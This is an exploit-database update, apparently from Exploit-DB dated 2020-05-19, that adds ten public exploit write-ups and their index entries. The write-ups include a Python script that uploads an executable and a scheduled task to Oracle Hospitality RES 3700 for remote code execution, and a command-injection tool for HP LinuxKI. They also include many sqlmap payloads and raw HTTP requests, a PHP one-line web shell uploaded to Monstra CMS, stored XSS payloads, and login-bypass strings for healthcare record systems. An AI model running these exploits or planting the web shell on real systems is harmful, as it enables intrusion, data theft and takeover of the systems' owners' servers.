DB: 2020-05-19

10 changes to exploits/shellcodes

HP LinuxKI 6.01 - Remote Command Injection
Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
Online Examination System 1.0 - 'eid' SQL Injection
Oracle Hospitality RES 3700 5.7 - Remote Code Execution
forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
online Chatting System 1.0 - 'id' SQL Injection
Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
Online Healthcare management system 1.0 - Authentication Bypass

exploits/hardware/webapps/48474.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
+# Exploit Author: jul10l1r4 (Julio Lira)
+# Google Dork: N/A
+# Date: 2020-05-16
+# Vendor Homepage: https://mikrotik.com
+# Software Link: https://mikrotik.com/download
+# Version: <= 1.2.3
+# Tested on: Debian 10 buster
+# CVE: 2020-13118
+Description: SQL Injection found in check_community.php:49
+
+$community = $_GET['community'];
+$_SESSION['community'] = $community;
+$query = "SELECT name from router where `community`='
+$community'";
+
+PoC:
+
+http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
+
+SQLmap using:
+sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

exploits/java/webapps/48477.txt

@@ -0,0 +1,65 @@
+# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
+# Date: 2019-10-01
+# Exploit Author: Walid Faour
+# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
+# Software Link: N/A (Available to customers)
+# Version: <= v5.7
+# Tested on: Windows Server 2003 / Windows Server 2008
+# CVE : CVE-2019-3025
+
+#!/usr/bin/env python
+
+#Author: Walid Faour
+#Date: Aug. 2, 2019
+#Oracle Hospitality RES 3700 Release 4.9 Exploit
+
+import binascii
+import requests
+
+print
+print '-------------------------------------------------'
+print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
+print '-------------------------------------------------'
+print
+
+IP = raw_input("Enter the IP address: ")
+URL = "http://" + IP + ":50123"
+
+f = open("attacker-4.9.exe",'rb')
+raw_payload = f.read()
+payload_hex = binascii.hexlify(raw_payload)
+f.close()
+
+g = open("attacker-4.9.job",'rb')
+raw_task = g.read()
+scheduled_task_hex = binascii.hexlify(raw_task)
+g.close()
+
+def exploit_body(data,full_path):
+	body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
+			<SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
+				<MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
+				<MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
+				<MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
+				<MCRS-ENV:InputParameters> \
+					<dst>' + full_path + '</dst> \
+					<fn>' + full_path + '</fn> \
+					<data>' + data + '</data> \
+				</MCRS-ENV:InputParameters> \
+			</SOAP-ENV:Body> \
+		</SOAP-ENV:Envelope>'
+	return body
+def exploit_headers(body):
+	headers = {
+		"Content-Type" : "text/xml",
+		"User-Agent" : "MDS POS Client",
+		"Host" : IP + ":50123",
+		"Content-Length" : str(len(body)),
+		"Connection" : "Keep-Alive"
+	}
+	return headers
+print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'
+body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
+body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")
+send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
+send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))

exploits/multiple/remote/48483.txt

@@ -0,0 +1,40 @@
+Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
+Date: 2020-05-17
+Exploit Author: Cody Winkler
+Vendor Homepage: https://www.hpe.com/us/en/home.html
+Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
+Version: <= v6.0-1
+Tested on: LinuxKI Docker Image
+CVE: CVE-2020-7209
+
+#!/usr/bin/env python3
+
+import requests
+import argparse
+import sys
+import re
+
+def parse_options():
+
+	formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
+	parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
+	parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
+	parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
+	parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
+	args = parser.parse_args()
+	return args
+
+def main(args):
+
+	host = args.host
+	port = args.port
+	cmd = args.cmd
+	path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
+	rce = requests.get('http://' + host + ':' + port + path, verify=False)
+	output = rce.text
+	a, b = output.find('BEGIN'), output.find('END')
+	print(output[a+6:b])
+
+if __name__ in "__main__":
+	args = parse_options()
+	main(args)

exploits/php/webapps/48475.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
+# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
+# Google Dork: N/A
+# Date: 2020-05-18
+# Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/
+# Software Link: https://vi.wordpress.org/plugins/ajax-load-more/
+# Version: <= 5.3.1
+# Tested on: Ubuntu 18.04
+
+Description:
+A blind SQL injection vulnerability is present in Ajax load more.
+$wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name
+= '$n'");
+
+POC:
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: lab-pwn.com
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
+Firefox/76.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 597
+Origin: http://lab-pwn.com
+Connection: close
+Cookie:
+wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3;
+wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2;
+wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1
+
+action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater='
+or sleep(5)#&type=test&alias=&nonce=ae68ab8c91
+
+SQL map:
+custom injection marker ('*') found in option '--data'. Do you want to
+process it? [Y/n/q]
+[12:43:16] [INFO] resuming back-end DBMS 'mysql'
+[12:43:16] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: #1* ((custom) POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: action=alm_update_repeater&value=<li <?php if
+(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
+   <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
+}?>
+   <h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
+?>"><?php the_title(); ?></a></h3>
+   <p class="entry-meta"><?php the_time("F d, Y"); ?></p>
+   <?php the_excerpt(); ?>
+</li>&repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: action=alm_update_repeater&value=<li <?php if
+(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
+   <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
+}?>
+   <h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
+?>"><?php the_title(); ?></a></h3>
+   <p class="entry-meta"><?php the_time("F d, Y"); ?></p>
+   <?php the_excerpt(); ?>
+</li>&repeater=' OR (SELECT 3214 FROM(SELECT
+COUNT(*),CONCAT(0x716a6b7a71,(SELECT
+(ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+AHqK#&type=test&alias=&nonce=ae68ab8c91
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: action=alm_update_repeater&value=<li <?php if
+(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
+   <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
+}?>
+   <h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
+?>"><?php the_title(); ?></a></h3>
+   <p class="entry-meta"><?php the_time("F d, Y"); ?></p>
+   <?php the_excerpt(); ?>
+</li>&repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91
+---
+[12:43:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Nginx
+back-end DBMS: MySQL >= 5.0

exploits/php/webapps/48476.txt

@@ -0,0 +1,53 @@
+# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-16
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html
+# Software Link:  https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+#Description: 
+Online Examination System Project is vulnerable to
+SQL injection via the 'eid' parameter on the account.php page.
+# Create a new account and Move to the profile on top right side (click)
+# vulnerable file : account.php
+# vulnerable Parameter: eid
+http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5
+
+Parameter: eid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5
+---
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+# Proof of Concept:
+http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5
+
+http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5
+GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5

exploits/php/webapps/48478.txt

@@ -0,0 +1,25 @@
+# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting 
+# Date: 2020-05-15
+# Exploit Author: Daniel Ortiz
+# Vendor Homepage: https://sourceforge.net/projects/forma/
+# Software link: https://sourceforge.net/projects/forma/files/latest/download
+# Tested on:  XAMPP for Linux 64bit 5.6.40-0
+
+
+
+## 1 -Course Module
+- Vulnerable parameter: course_code, course_name, course_box_descr, course_descr
+- Payload: <SCRIPT>alert('XSS');</SCRIPT>
+- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
+- Privileges: It requires admin.
+- Location: Admin Area > E-learning > Courses > Courses > Edit Course
+- Endopoint: /formalms/appCore/index.php?r=alms/course/modcourse
+
+
+## 1 -Profile Module
+- Vulnerable parameter: Email
+- Payload: <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
+- Details: There is some control on this field but can bypassed.
+- Privileges: Do not requires admin or student account.
+- Location: My Profile > Edit > Put the payload in Email field.
+- Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo

exploits/php/webapps/48479.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
+# Google Dork: N/A
+# Date: 2020-05-18
+# Exploit Author: Kishan Lal Choudhary
+# Vendor Homepage: https://monstra.org
+# Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested on: Ubuntu
+
+
+
+1. Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
+
+2. Upload a one liner shell with php7 extenstion ie: shell.php7
+
+#burp request
+------------------------------------EOF-----------------------------------------------------
+POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
+Host: 192.168.2.5
+Content-Length: 548
+Cache-Control: max-age=0
+Origin: http://192.168.2.5
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
+Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
+Connection: close
+
+------WebKitFormBoundarytRfyCkYq8NvztDBf
+Content-Disposition: form-data; name="csrf"
+
+2e6ae2353998caa319aae262b113c6b3f17a9636
+------WebKitFormBoundarytRfyCkYq8NvztDBf
+Content-Disposition: form-data; name="file"; filename="shell.php7"
+Content-Type: application/octet-stream
+
+<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
+
+
+------WebKitFormBoundarytRfyCkYq8NvztDBf
+Content-Disposition: form-data; name="upload_file"
+
+Upload
+------WebKitFormBoundarytRfyCkYq8NvztDBf--
+
+------------------------------------EOF-----------------------------------------------------
+
+
+3. trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
+
+
+
+
+We have successfully got Remote Code execution

exploits/php/webapps/48480.txt

@@ -0,0 +1,47 @@
+# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-17
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html
+# Software Link:  https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+ The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page.
+# vulnerable file : chatroom.php
+http://localhost/chat_system/user/chatroom.php?id=5
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS
+
+    Type: time-based blind
+    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
+    Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd
+---
+[INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+# Proof of Concept:
+http://localhost/chat_system/user/chatroom.php?id=5
+
+GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS

exploits/php/webapps/48481.txt

@@ -0,0 +1,64 @@
+# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-05-18
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
+# Version: N/A
+# Tested on: Kali Linux 2020.2 x64
+# CVE : N/A
+
+
+The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities: 
+
+The login.php file allows a user to just supply ‘ or 1=1 – as a username and whatever password and bypass the authentication
+
+<?php
+        session_start();
+        if(ISSET($_POST['login'])){
+                $username = $_POST['username'];
+                $password = $_POST['password'];
+                $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
+                $query = $conn->query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
+
+The same happens with login.php for the admin area:
+
+<?php
+        session_start();
+        $username = $_POST['username'];
+        $password = $_POST['password'];
+        if(ISSET($_POST['login'])){
+                $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
+                $query = $conn->query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
+                $fetch = $query->fetch_array();
+                $valid = $query->num_rows;
+                        if($valid > 0){
+                                $_SESSION['admin_id'] = $fetch['admin_id'];
+                                header("location:home.php");
+
+
+
+There is also an authentication bypass issue located in add_user.php:
+
+<?php
+        if(ISSET($_POST['save_user'])){
+                $username = $_POST['username']; 
+                $password = $_POST['password']; 
+                $firstname = $_POST['firstname']; 
+                $middlename = $_POST['middlename']; 
+                $lastname = $_POST['lastname']; 
+                $section = $_POST['section']; 
+                $conn = new mysqli("localhost", "root", "", "hcpms");
+                $q1 = $conn->query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error());
+                $f1 = $q1->fetch_array();
+                $c1 = $q1->num_rows;
+                        if($c1 > 0){
+                                echo "<script>alert('Username already taken')</script>";
+                        }else{
+                                $conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')");
+                                header("location: user.php");
+                        }
+        }
+If a request is made with the required parameters, any user can create an admin account (no authentication is required to do this).
+
+Finally, there are many SQL injection vulnerabilities (GET parameters directly passed to SQL queries), but those are authenticated

exploits/php/webapps/48482.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-05-16
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
+# Software Link:  https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php || admin/login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/onlinehealthcare/admin/login.php
+
+POST /onlinehealthcare/admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------293261110021842
+Content-Length: 356
+Referer: http://localhost/onlinehealthcare/admin/index.php
+Cookie: _ga=GA1.1.1353584531.1478253768
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------293261110021842: undefined
+Content-Disposition: form-data; name="username"
+'=''or'
+-----------------------------293261110021842
+Content-Disposition: form-data; name="password"
+
+'=''or'
+-----------------------------293261110021842
+Content-Disposition: form-data; name="login"
+
+
+-----------------------------293261110021842--

files_exploits.csv

@@ -18147,6 +18147,7 @@ id,file,description,date,author,type,platform,port
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
+48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42703,3 +42704,12 @@ id,file,description,date,author,type,platform,port
 48471,exploits/php/webapps/48471.txt,"E-Commerce System 1.0 - Unauthenticated Remote Code Execution",2020-05-14,SunCSR,webapps,php,
 48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php,
 48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java,
+48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware,
+48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
+48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,
+48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java,
+48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php,
+48479,exploits/php/webapps/48479.txt,"Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload",2020-05-18,"Kishan Lal Choudhary",webapps,php,
+48480,exploits/php/webapps/48480.txt,"online Chatting System 1.0 - 'id' SQL Injection",2020-05-18,BKpatron,webapps,php,
+48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php,
+48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,